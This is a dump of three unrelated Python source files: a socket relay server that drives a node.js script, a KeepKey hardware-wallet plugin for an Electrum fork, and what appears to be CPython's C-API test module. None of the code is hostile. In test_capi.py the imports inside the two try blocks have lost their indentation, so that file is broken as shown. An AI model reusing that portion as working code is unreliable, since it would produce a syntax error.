        '''
        Called after a client connects. Override this in a subclass to
        be notified of connections.

        client - a Client instance representing the connection
        '''
        pass
    def on_message(self, client, data):
        '''
        Called when client sends a message. Override this in a subclass to
        be notified of sent messages.

        client - a Client instance representing the connection
        data - a string with the transmitted data
        '''
        pass
    def on_disconnect(self, client):
        '''
        Called after a client disconnects. Override this in a subclass to
        be notified of disconnections.

        client - a Client instance representing the connection
        '''
        pass
    def broadcast(self, data):
        '''
        Send a message to all connected clients.

        data - a string with the data to transmit
        '''
        self._send(data, { 'broadcast': True })
    def listen(self, ws_port, py_port=None, fork=False):
        '''
        Run the server on the port given by ws_port. We actually need two
        ports, an external one for the browser (ws_port) and an internal
        one to communicate with node.js (py_port):

        browser:     node.js:                this module:
        ---------    ----------------------  ---------------------
        io.Socket <-> ws_port <-> TCP socket <-> py_port <-> io.Socket

        ws_port - the port that the browser will connect to
        py_port - the port that python will use to talk to node.js
                  (defaults to ws_port + 1)
        fork - when true, run the receive loop in a child process via
               multiprocessing and return immediately; otherwise this
               call blocks forever
        '''
        # set default port
        if py_port is None:
            py_port = ws_port + 1
        # create a custom node.js script with both ports baked in
        js = _js % (ws_port, py_port)
        handle, path = tempfile.mkstemp(suffix='.js')
        os.write(handle, js)
        os.close(handle)
        # run that script in node.js and make sure the child process and
        # the temp file are cleaned up on interpreter exit
        process = subprocess.Popen(['nodejs', path])
        def cleanup():
            process.kill()
            os.remove(path)
        atexit.register(cleanup)
        # make sure we can communicate with node.js; accept() blocks until
        # the node.js script opens its TCP connection back to us
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('localhost', py_port))
        sock.listen(0)
        sock, addr = sock.accept()
        def send(data, info):
            # Frame messages to node.js as JSON terminated by '\0'.
            info['data'] = data
            sock.send(json.dumps(info) + '\0')
        self._send = send
        def run():
            # run the server: accumulate bytes from node.js and peel off
            # complete '\0'-terminated JSON frames
            buffer = ''
            while 1:
                buffer += sock.recv(4096)
                index = buffer.find('\0')
                while index >= 0:
                    data, buffer = buffer[0:index], buffer[index+1:]
                    self._handle(json.loads(data))
                    index = buffer.find('\0')
        if(fork):
            # run in a child process so the caller's thread is not blocked
            p = multiprocessing.Process(target=run)
            p.start()
            def killprocess():
                p.terminate()
            atexit.register(killprocess)
        else:
            run()
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_vestx.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_vestx.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_vestx.bip32 import BIP32Node
from electrum_vestx import constants
from electrum_vestx.i18n import _
from electrum_vestx.transaction import deserialize, Transaction
from electrum_vestx.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_vestx.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
    """Keystore backed by a KeepKey hardware wallet."""
    hw_type = 'keepkey'
    device = 'KeepKey'

    def get_derivation(self):
        """Return the BIP32 derivation prefix of this keystore."""
        return self.derivation

    def get_client(self, force_pair=True):
        """Obtain a device client from the owning plugin."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        """Message decryption is not supported on this device."""
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* with the key at derivation suffix *sequence*."""
        device_client = self.get_client()
        path_text = self.get_derivation() + "/%d/%d" % sequence
        path_nodes = device_client.expand_path(path_text)
        signed = device_client.sign_message(self.plugin.get_coin_name(), path_nodes, message)
        return signed.signature

    def sign_transaction(self, tx, password):
        """Sign *tx* on the device; an already-complete tx is left alone."""
        if tx.is_complete():
            return
        prev_tx = {}    # prevout txid -> previous transaction (inputs)
        xpub_path = {}  # xpub -> derivation path, for our own keys only
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            prevout_id = txin['prevout_hash']
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[prevout_id] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if is_xpubkey(x_pubkey):
                    xpub, s = parse_xpubkey(x_pubkey)
                    if xpub == self.get_master_public_key():
                        xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
    # Derived classes provide:
    #
    #  class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, ckd_public, types, HidTransport
    firmware_URL = 'https://www.keepkey.com'
    libraries_URL = 'https://github.com/keepkey/python-keepkey'
    minimum_firmware = (1, 0, 0)
    keystore_class = KeepKey_KeyStore
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    MAX_LABEL_LEN = 32
    def __init__(self, parent, config, name):
        """Load the keepkeylib dependencies; mark the plugin unavailable
        (libraries_available=False) instead of failing if they are missing."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            import keepkeylib.transport_webusb
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
                               keepkeylib.transport_webusb.DEVICE_IDS)
            self.device_manager().register_devices(self.DEVICE_IDS)
            self.libraries_available = True
        except ImportError:
            self.libraries_available = False
    def hid_transport(self, pair):
        """Return a HID transport for the given device path pair."""
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)
    def webusb_transport(self, device):
        """Return a WebUSB transport, matching *device* by serial number
        against enumerated devices when possible."""
        from keepkeylib.transport_webusb import WebUsbTransport
        for d in WebUsbTransport.enumerate():
            if device.id_.startswith(d.getSerialNumber()):
                return WebUsbTransport(d)
        return WebUsbTransport(device)
    def _try_hid(self, device):
        """Best-effort HID connection; returns a transport or None."""
        self.logger.info("Trying to connect over USB...")
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
    def _try_webusb(self, device):
        """Best-effort WebUSB connection; returns a transport or None."""
        self.logger.info("Trying to connect over WebUSB...")
        try:
            return self.webusb_transport(device)
        except BaseException as e:
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
    def create_client(self, device, handler):
        """Open a transport to *device*, sanity-check it with a ping, and
        verify the firmware version; returns a client or None on failure."""
        if device.product_key[1] == 2:
            transport = self._try_webusb(device)
        else:
            transport = self._try_hid(device)
        if not transport:
            self.logger.info("cannot connect to device")
            return
        self.logger.info(f"connected to device at {device.path}")
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.logger.info(f"ping failed {e}")
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.logger.info(msg)
            if handler:
                handler.show_error(msg)
            else:
                raise UserFacingException(msg)
            return None
        return client
    def get_client(self, keystore, force_pair=True):
        """Return (and mark as used) the client paired with *keystore*."""
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
    def get_coin_name(self):
        """Coin name string expected by the KeepKey protocol."""
        return "Testnet" if constants.net.TESTNET else "Bitcoin"
    def initialize_device(self, device_id, wizard, handler):
        """Ask the user how to initialize the device, then run the chosen
        initialization on a background thread via _initialize_device_safe."""
        # Initialization method
        msg = _("Choose how you want to initialize your {}.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your {}, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
        ).format(self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]
        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            exit_code = wizard.loop.exec_()
            if exit_code != 0:
                # this method (initialize_device) was called with the expectation
                # of leaving the device in an initialized state when finishing.
                # signal that this is not the case:
                raise UserCancelled()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Wrapper that converts exceptions into a non-zero wizard exit code."""
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            self.logger.exception('')
            handler.show_error(str(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Perform the actual device initialization for the chosen method
        (new seed, seed recovery, mnemonic upload, or xprv upload)."""
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if not client:
            raise Exception(_("The device was disconnected."))
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
    def _make_node_path(self, xpub, address_n):
        """Convert *xpub* plus a derivation suffix into the protobuf
        HDNodePathType the KeepKey protocol expects."""
        bip32node = BIP32Node.from_xkey(xpub)
        node = self.types.HDNodeType(
            depth=bip32node.depth,
            fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
            child_num=int.from_bytes(bip32node.child_number, 'big'),
            chain_code=bip32node.chaincode,
            public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
        )
        return self.types.HDNodePathType(node=node, address_n=address_n)
    def setup_device(self, device_info, wizard, purpose):
        """Prepare a device for use by the wizard, initializing it first
        if it has no seed yet."""
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        if client is None:
            raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
                                      _('Make sure it is in the correct state.'))
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        client.get_xpub('m', 'standard')
        client.used()
    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Fetch the xpub at *derivation* from the device."""
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub
    def get_keepkey_input_script_type(self, electrum_txin_type: str):
        """Map an electrum txin type to the device's input script type enum."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return self.types.SPENDWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return self.types.SPENDP2SHWITNESS
        if electrum_txin_type in ('p2pkh', ):
            return self.types.SPENDADDRESS
        if electrum_txin_type in ('p2sh', ):
            return self.types.SPENDMULTISIG
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
    def get_keepkey_output_script_type(self, electrum_txin_type: str):
        """Map an electrum txin type to the device's output script type enum."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return self.types.PAYTOWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return self.types.PAYTOP2SHWITNESS
        if electrum_txin_type in ('p2pkh', ):
            return self.types.PAYTOADDRESS
        if electrum_txin_type in ('p2sh', ):
            return self.types.PAYTOMULTISIG
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign *tx* on the device and write the signatures back into it.
        A '01' (SIGHASH_ALL) byte is appended to each DER signature."""
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True)
        outputs = self.tx_outputs(keystore.get_derivation(), tx)
        signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
                                    lock_time=tx.locktime, version=tx.version)[0]
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)
    def show_address(self, wallet, address, keystore=None):
        """Display *address* on the device screen for user verification."""
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) == 1:
            script_type = self.get_keepkey_input_script_type(wallet.txin_type)
            client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
        else:
            def f(xpub):
                return self._make_node_path(xpub, [change, index])
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
            pubkeys = list(map(f, sorted_xpubs))
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * wallet.n,
                m=wallet.m,
            )
            script_type = self.get_keepkey_input_script_type(wallet.txin_type)
            client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
    def tx_inputs(self, tx, for_sig=False):
        """Convert electrum tx inputs to protobuf TxInputType objects.
        With for_sig=True, derivation paths (and multisig data) are filled
        in so the device can sign; otherwise only prevout data is set."""
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = b"\x00"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # single-sig: derive the one key path
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype.address_n.extend(xpub_n + s)
                        txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
                    else:
                        # multisig: build the redeem script description
                        def f(x_pubkey):
                            xpub, s = parse_xpubkey(x_pubkey)
                            return self._make_node_path(xpub, s)
                        pubkeys = list(map(f, x_pubkeys))
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
                            m=txin.get('num_sig'),
                        )
                        script_type = self.get_keepkey_input_script_type(txin['type'])
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype.address_n.extend(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if txin.get('scriptSig') is not None:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs
    def tx_outputs(self, derivation, tx):
        """Convert electrum tx outputs to protobuf TxOutputType objects.
        Outputs recognized as our own change are sent by derivation path
        (so the device can hide them from confirmation); everything else
        is sent by address/script."""
        # NOTE: both helpers close over the per-output loop variables
        # (info, index, xpubs, m, amount, _type, address, o) set below.
        def create_output_by_derivation():
            script_type = self.get_keepkey_output_script_type(info.script_type)
            if len(xpubs) == 1:
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                address_n = self.client_class.expand_path("/%d/%d" % index)
                pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype
        def create_output_by_address():
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.PAYTOOPRETURN
                txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = self.types.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype
        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
        for o in tx.outputs():
            _type, address, amount = o.type, o.address, o.value
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation()
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)
        return outputs
    def electrum_tx_to_txtype(self, tx):
        """Convert an electrum Transaction into the protobuf TransactionType
        used to describe previous transactions to the device."""
        t = self.types.TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t.inputs.extend(inputs)
        for vout in d['outputs']:
            o = t.bin_outputs.add()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t
    # This function is called from the TREZOR libraries (via tx_api)
    def get_tx(self, tx_hash):
        """Look up a previous transaction cached by sign_transaction()."""
        tx = self.prev_tx[tx_hash]
        return self.electrum_tx_to_txtype(tx)
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
    """some doc"""
    # Identity function: wrapped by _testcapi.instancemethod below to
    # exercise instancemethod descriptor behaviour.
    return self
class InstanceMethod:
    # Wraps a builtin and a Python function with _testcapi.instancemethod;
    # CAPITest.test_instancemethod checks that the wrappers bind to
    # instances and preserve __doc__ and attributes.
    id = _testcapi.instancemethod(id)
    testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
    """Tests for assorted _testcapi entry points (Python/C API checks)."""

    def test_instancemethod(self):
        # instancemethod wrappers must bind like plain Python functions.
        inst = InstanceMethod()
        self.assertEqual(id(inst), inst.id())
        self.assertTrue(inst.testfunction() is inst)
        self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
        self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)

        InstanceMethod.testfunction.attribute = "test"
        self.assertEqual(testfunction.attribute, "test")
        self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")

    @unittest.skipUnless(threading, 'Threading required for this test.')
    def test_no_FatalError_infinite_loop(self):
        # Calling the C API with no current thread state must abort with a
        # fatal error, not hang.
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import _testcapi;'
                                  '_testcapi.crash_no_current_thread()'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            (out, err) = p.communicate()
        self.assertEqual(out, b'')
        # This used to cause an infinite loop.
        self.assertTrue(err.rstrip().startswith(
                         b'Fatal Python error:'
                         b' PyThreadState_Get: no current thread'))

    def test_memoryview_from_NULL_pointer(self):
        self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)

    def test_exc_info(self):
        # PyErr_SetExcInfo/PyErr_GetExcInfo round-trip via set_exc_info().
        raised_exception = ValueError("5")
        new_exc = TypeError("TEST")
        try:
            raise raised_exception
        except ValueError as e:
            tb = e.__traceback__
            orig_sys_exc_info = sys.exc_info()
            orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
            new_sys_exc_info = sys.exc_info()
            new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
            reset_sys_exc_info = sys.exc_info()

            self.assertEqual(orig_exc_info[1], e)

            self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
            self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
            self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
        else:
            self.assertTrue(False)

    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_seq_bytes_to_charp_array(self):
        # Issue #15732: crash in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return 1
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
        # Issue #15736: overflow in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return sys.maxsize
            def __getitem__(self, i):
                return b'x'
        self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)

    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_subprocess_fork_exec(self):
        class Z(object):
            def __len__(self):
                return 1

        # Issue #15738: crash in subprocess_fork_exec()
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)

    @unittest.skipIf(MISSING_C_DOCSTRINGS,
                     "Signature information for builtins requires docstrings")
    def test_docstring_signature_parsing(self):
        # Check how the "name(sig)\n--\n\n" convention in C docstrings is
        # split between __doc__ and __text_signature__.
        self.assertEqual(_testcapi.no_docstring.__doc__, None)
        self.assertEqual(_testcapi.no_docstring.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_empty.__doc__, None)
        self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_no_signature.__doc__,
            "This docstring has no signature.")
        self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
            "docstring_with_invalid_signature($module, /, boo)\n"
            "\n"
            "This docstring has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
            "docstring_with_invalid_signature2($module, /, boo)\n"
            "\n"
            "--\n"
            "\n"
            "This docstring also has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_signature.__doc__,
            "This docstring has a valid signature.")
        self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")

        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
            "($module, /, sig)")

        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
            "\nThis docstring has a valid signature and some extra newlines.")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
            "($module, /, parameter)")

    def test_c_type_with_matrix_multiplication(self):
        # A C type implementing nb_matrix_multiply / nb_inplace_matrix_multiply
        # must work with the @ and @= operators, including reflected calls.
        M = _testcapi.matmulType
        m1 = M()
        m2 = M()
        self.assertEqual(m1 @ m2, ("matmul", m1, m2))
        self.assertEqual(m1 @ 42, ("matmul", m1, 42))
        self.assertEqual(42 @ m1, ("matmul", 42, m1))
        o = m1
        o @= m2
        self.assertEqual(o, ("imatmul", m1, m2))
        o = m1
        o @= 42
        self.assertEqual(o, ("imatmul", m1, 42))
        o = 42
        o @= m1
        self.assertEqual(o, ("matmul", 42, m1))

    def test_return_null_without_error(self):
        # Issue #23571: A function must not return NULL without setting an
        # error
        if Py_DEBUG:
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_null_without_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: a function returned NULL '
                             br'without setting an error\n'
                             br'SystemError: <built-in function '
                             br'return_null_without_error> returned NULL '
                             br'without setting an error\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br'  File .*", line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_null_without_error()
            self.assertRegex(str(cm.exception),
                             'return_null_without_error.* '
                             'returned NULL without setting an error')

    def test_return_result_with_error(self):
        # Issue #23571: A function must not return a result with an error set
        if Py_DEBUG:
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_result_with_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: a function returned a '
                             br'result with an error set\n'
                             br'ValueError\n'
                             br'\n'
                             br'The above exception was the direct cause '
                             br'of the following exception:\n'
                             br'\n'
                             br'SystemError: <built-in '
                             br'function return_result_with_error> '
                             br'returned a result with an error set\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br'  File .*, line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_result_with_error()
            self.assertRegex(str(cm.exception),
                             'return_result_with_error.* '
                             'returned a result with an error set')

    def test_buildvalue_N(self):
        _testcapi.test_buildvalue_N()
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
    """Tests for Py_AddPendingCall via _testcapi._pending_threadfunc."""

    def pendingcalls_submit(self, l, n):
        # Submit n pending calls, each of which appends to l when the main
        # thread eventually runs it.
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)

        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break;

    def pendingcalls_wait(self, l, n, context = None):
        # Busy-wait on the main thread until all n callbacks have run,
        # failing the test after a bounded number of iterations.
        #now, stick around until l[0] has grown to 10
        count = 0;
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks.  Note that callbacks are only run on the
            #main thread
            if False and support.verbose:
                print("(%i)"%(len(l),),)
            for i in range(1000):
                a = i*i
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and support.verbose:
            print("(%i)"%(len(l),))

    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()

        threads = [threading.Thread(target=self.pendingcalls_thread,
                                    args=(context,))
                   for i in range(context.nThreads)]
        with support.start_threads(threads):
            self.pendingcalls_wait(context.l, n, context)

    def pendingcalls_thread(self, context):
        # Worker: submit this thread's share, then signal completion once
        # the last thread finishes.
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and support.verbose:
                    print("finished threads: ", nFinished)
        if nFinished == context.nThreads:
            context.event.set()

